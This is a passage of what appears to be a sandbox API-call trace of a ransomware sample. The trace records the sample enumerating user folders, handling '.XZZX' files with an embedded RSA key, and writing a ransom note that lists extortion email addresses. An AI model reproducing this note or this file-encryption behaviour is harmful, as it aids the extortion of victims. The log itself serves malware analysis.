returned="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" [0196.129] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0196.129] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd30 [0196.129] Sleep (dwMilliseconds=0x96) [0196.284] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.284] lstrcmpW (lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpString2="..") returned 1 [0196.284] lstrcmpW (lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpString2=".") returned 1 [0196.285] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0196.285] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="ntldr") returned 0x0 [0196.285] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="NTLDR") returned 0x0 [0196.285] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0196.285] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0196.285] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0196.285] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") [0196.285] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.285] lstrcpyW (in: lpString1=0x17cf1c, lpString2="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" | out: lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" [0196.285] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0196.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd34 [0196.285] Sleep (dwMilliseconds=0x96) [0196.440] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.440] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0196.440] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0196.440] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0196.441] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0196.441] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0196.441] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0196.441] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0196.441] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0196.441] SetErrorMode (uMode=0x1) returned 0x1 [0196.441] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT") returned 60 [0196.441] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0196.441] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0196.441] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd38) returned 0x0 [0196.442] RegQueryValueExW (in: hKey=0xd38, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b0068, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b0068*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0196.442] RegCloseKey (hKey=0xd38) returned 0x0 [0196.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0196.442] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0196.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd38 [0196.442] CloseHandle (hObject=0xd38) returned 1 [0196.442] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0196.442] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="Searches" [0196.442] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0196.442] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0196.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0196.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0196.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0196.443] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0196.443] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0196.443] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0196.443] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0196.443] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0196.443] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0196.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0196.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0196.443] SetErrorMode (uMode=0x1) returned 0x1 [0196.443] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0196.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0196.443] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0196.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0196.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0196.443] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.443] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0196.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0196.443] SetErrorMode (uMode=0x1) returned 0x1 [0196.444] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT") returned 58 [0196.444] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0196.444] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0196.444] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd3c) returned 0x0 [0196.444] RegQueryValueExW (in: hKey=0xd3c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b0298, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b0298*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0196.444] RegCloseKey (hKey=0xd3c) returned 0x0 [0196.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0196.444] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0196.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0196.444] CloseHandle (hObject=0xd3c) returned 1 [0196.444] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0196.445] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.445] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0196.445] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0196.445] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0196.445] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0196.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0196.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0196.445] SetErrorMode (uMode=0x1) returned 0x1 [0196.445] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0196.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0196.445] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0196.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0196.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0196.445] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.445] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0196.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0196.445] SetErrorMode (uMode=0x1) returned 0x1 [0196.445] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT") returned 62 [0196.445] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0196.446] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0196.446] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd3c) returned 0x0 [0196.446] RegQueryValueExW (in: hKey=0xd3c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b04c8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b04c8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0196.446] RegCloseKey (hKey=0xd3c) returned 0x0 [0196.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0196.446] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0196.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0196.446] CloseHandle (hObject=0xd3c) returned 1 [0196.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0196.446] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.446] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0196.446] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0196.446] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0196.446] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0196.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0196.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0196.447] SetErrorMode (uMode=0x1) returned 0x1 [0196.447] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0196.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0196.447] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0196.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0196.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0196.447] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.447] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0196.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0196.447] SetErrorMode (uMode=0x1) returned 0x1 [0196.447] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT") returned 61 [0196.447] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0196.447] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0196.447] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd3c) returned 0x0 [0196.448] RegQueryValueExW (in: hKey=0xd3c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b7d88, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b7d88*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0196.448] RegCloseKey (hKey=0xd3c) returned 0x0 [0196.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0196.448] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0196.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 